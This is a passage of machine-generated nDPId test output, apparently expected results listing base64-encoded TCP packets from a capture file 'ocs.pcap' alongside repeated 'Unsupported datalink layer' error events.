layer","datalink":12,"packet_id":759,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831679} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":759,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNiQABABn+HwKi0ArL40DbC2QBQ64tGkd7z8OOAEC\/qhdoAAAEBCAoANZQ0RwYokA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":760,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831680} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":760,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNjQABABn+GwKi0ArL40DbC2QBQ64tGkd7z9k+AEC\/qgG4AAAEBCAoANZQ0RwYokA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":761,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831746} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":761,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNkQABABn+FwKi0ArL40DbC2QBQ64tGkd7z+7uAEC\/qeu0AAAEBCAoANZQ7RwYong=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":762,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831749} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":762,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNlQABABn+EwKi0ArL40DbC2QBQ64tGkd70ASeAEC\/qdYEAAAEBCAoANZQ7RwYong=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":763,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831750} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":763,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNmQABABn+DwKi0ArL40DbC2QBQ64tGkd70BpOAEC\/WcCkAAAEBCAoANZQ7RwYong=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":764,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831803} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":764,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNnQABABn+CwKi0ArL40DbC2QBQ64tGkd70C\/+AEC\/qapQAAAEBCAoANZRARwYorg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":765,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831806} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":765,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNoQABABn+BwKi0ArL40DbC2QBQ64tGkd70EWuAEC\/qZSYAAAEBCAoANZRBRwYorw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":766,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831809} 
-00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":766,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNpQABABn+AwKi0ArL40DbC2QBQ64tGkd70FteAEC\/qX7oAAAEBCAoANZRBRwYorw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":767,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831871} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":767,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNqQABABn9\/wKi0ArL40DbC2QBQ64tGkd70HEOAEC\/qWjsAAAEBCAoANZRHRwYovA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":768,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831878} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":768,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNrQABABn9ywKi0ArL40DbC2QBQ64tGkd70HEOwEC\/qHW8AAAEBCAoANZRIRwYovAEBBQre9CGv3vQnGw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":769,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831929} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":769,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNsQABABn9xwKi0ArL40DbC2QBQ64tGkd70HEOwEC\/qF\/4AAAEBCAoANZRNRwYovAEBBQre9CGv3vQshw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":770,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831936} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":770,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNtQABABn9wwKi0ArL40DbC2QBQ64tGkd70HEOwEC\/qEpIAAAEBCAoANZRNRwYovAEBBQre9CGv3vQx8w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":771,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831937} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":771,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNuQABABn9vwKi0ArL40DbC2QBQ64tGkd70HEOwEC\/qDSYAAAEBCAoANZRNRwYovAEBBQre9CGv3vQ3Xw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":772,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831988} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":772,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNvQABABn9uwKi0ArL40DbC2QBQ64tGkd70HEOwEC\/qB7QAAAEBCAoANZRTRwYovAEBBQre9CGv3vQ8yw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":773,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831990} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":773,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNwQABABn95wKi0ArL40DbC2QBQ64tGkd70PMuAEC+XOdgAAAEBCAoANZRTRwYo3g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":774,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832021} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":774,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNxQABABn94wKi0ArL40DbC2QBQ64tGkd70QjeAEC\/WNB0AAAEBCAoANZRWRwYo6w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":775,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832025} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":775,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNyQABABn93wKi0ArL40DbC2QBQ64tGkd70R6OAEC\/BLsQAAAEBCAoANZRXRwYo7A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":776,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832079} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":776,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNzQABABn92wKi0ArL40DbC2QBQ64tGkd70TQ+AEC\/qKSMAAAEBCAoANZRcRwYo8w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":777,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832081} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":777,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMN0QABABn91wKi0ArL40DbC2QBQ64tGkd70UnuAEC\/qI7cAAAEBCAoANZRcRwYo8w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":778,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832083} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":778,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMN1QABABn90wKi0ArL40DbC2QBQ64tGkd70V+eAEC\/WHl4AAAEBCAoANZRcRwYo9A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":779,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832169} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":779,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMN2QABABn9zwKi0ArL40DbC2QBQ64tGkd70XVOAEC\/qGMgAAAEBCAoANZRlRwYpAQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":780,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832169} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":780,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMN3QABABn9mwKi0ArL40DbC2QBQ64tGkd70XVOwEC\/qWdwAAAEBCAoANZRlRwYpAQEBBQre9GK\/3vRoKw=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":781,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832236} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":781,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMN4QABABn9dwKi0ArL40DbC2QBQ64tGkd70XVPQEC\/qm0AAAAEBCAoANZRsRwYpAQEBBRLe9G2X3vRzA970Yr\/e9Ggr"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":782,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832236} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":782,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMN5QABABn9cwKi0ArL40DbC2QBQ64tGkd70XVPQEC\/qldQAAAEBCAoANZRsRwYpAQEBBRLe9G2X3vR4b970Yr\/e9Ggr"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":783,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832300} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":783,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMN6QABABn9jwKi0ArL40DbC2QBQ64tGkd70aCuwEC\/BM9wAAAEBCAoANZRyRwYpKQEBBQre9G2X3vR4bw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":784,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832705} 
-00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":784,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMN7QABABn9uwKi0ArL40DbC2QBQ64tGkd70eG+AEC\/W\/Q0AAAEBCAoANZSbRwYpfQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":785,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832787} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":785,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMN8QABABn9hwKi0ArL40DbC2QBQ64tGkd70eG+wEC\/qB84AAAEBCAoANZSjRwYpfQEBBQre9H3b3vSDRw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":786,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832861} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":786,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMN9QABABn9gwKi0ArL40DbC2QBQ64tGkd70eG+wEC\/qAlsAAAEBCAoANZSqRwYpfQEBBQre9H3b3vSIsw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":787,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832947} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":787,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMN+QABABn9fwKi0ArL40DbC2QBQ64tGkd70eG+wEC\/q\/OUAAAEBCAoANZSzRwYpfQEBBQre9H3b3vSOHw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":788,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833018} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":788,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMN\/QABABn9ewKi0ArL40DbC2QBQ64tGkd70eG+wEC\/q93IAAAEBCAoANZS6RwYpfQEBBQre9H3b3vSTiw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":789,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833061} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":789,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOAQABABn9pwKi0ArL40DbC2QBQ64tGkd70k4uAEC+s4Y4AAAEBCAoANZS+RwYp5w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":790,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833145} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":790,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOBQABABn9owKi0ArL40DbC2QBQ64tGkd70mPeAEC\/q28sAAAEBCAoANZTHRwYp9w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":791,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833203} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":791,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOCQABABn9bwKi0ArL40DbC2QBQ64tGkd70mPewEC\/qpZIAAAEBCAoANZTMRwYp9wEBBQre9J5j3vSjzw=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":792,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833203} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":792,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMODQABABn9awKi0ArL40DbC2QBQ64tGkd70mPewEC\/qoCYAAAEBCAoANZTMRwYp9wEBBQre9J5j3vSpOw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":793,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833266} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":793,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOEQABABn9ZwKi0ArL40DbC2QBQ64tGkd70mPewEC\/qmrQAAAEBCAoANZTSRwYp9wEBBQre9J5j3vSupw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":794,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833266} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":794,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOFQABABn9YwKi0ArL40DbC2QBQ64tGkd70mPewEC\/qlUgAAAEBCAoANZTSRwYp9wEBBQre9J5j3vS0Ew=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":795,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833322} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":795,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOGQABABn9jwKi0ArL40DbC2QBQ64tGkd70tBOAEC+swKUAAAEBCAoANZTYRwYqLg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":796,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833323} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":796,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOHQABABn9iwKi0ArL40DbC2QBQ64tGkd70uX+AEC+Xu04AAAEBCAoANZTYRwYqLg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":797,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833396} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":797,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOIQABABn9VwKi0ArL40DbC2QBQ64tGkd70uX+wEC\/qQ7AAAAEBCAoANZTfRwYqLgEBBQre9L7r3vTEVw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":798,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833397} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":798,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOJQABABn9UwKi0ArL40DbC2QBQ64tGkd70uX+wEC\/qPkMAAAEBCAoANZTgRwYqLgEBBQre9L7r3vTJww=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":799,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833471} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":799,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOKQABABn9TwKi0ArL40DbC2QBQ64tGkd70uX+wEC\/qONAAAAEBCAoANZTnRwYqLgEBBQre9L7r3vTPLw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":800,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833472} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":800,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOLQABABn9SwKi0ArL40DbC2QBQ64tGkd70uX+wEC\/qM2QAAAEBCAoANZTnRwYqLgEBBQre9L7r3vTUmw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":801,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833550} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":801,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOMQABABn9dwKi0ArL40DbC2QBQ64tGkd701JuAEC+sn9cAAAEBCAoANZTvRwYqXQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":802,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833553} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":802,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMONQABABn9cwKi0ArL40DbC2QBQ64tGkd702geAEC\/qmiwAAAEBCAoANZTvRwYqXg=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":803,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833622} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":803,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOOQABABn9PwKi0ArL40DbC2QBQ64tGkd702gewEC\/q1vgAAAEBCAoANZT2RwYqXgEBBQre9OTf3vTqSw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":804,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833935} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":804,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOPQABABn9OwKi0ArL40DbC2QBQ64tGkd7033OwEC\/q0RIAAAEBCAoANZUVRwYquQEBBQre9OTf3vTqSw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":805,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833993} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":805,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMOQQABABn9FwKi0ArL40DbC2QBQ64tGkd7033PQEC\/qDjcAAAEBCAoANZUbRwYquQEBBRLe9O+33vT1I9705N\/e9OpL"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":806,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833995} 
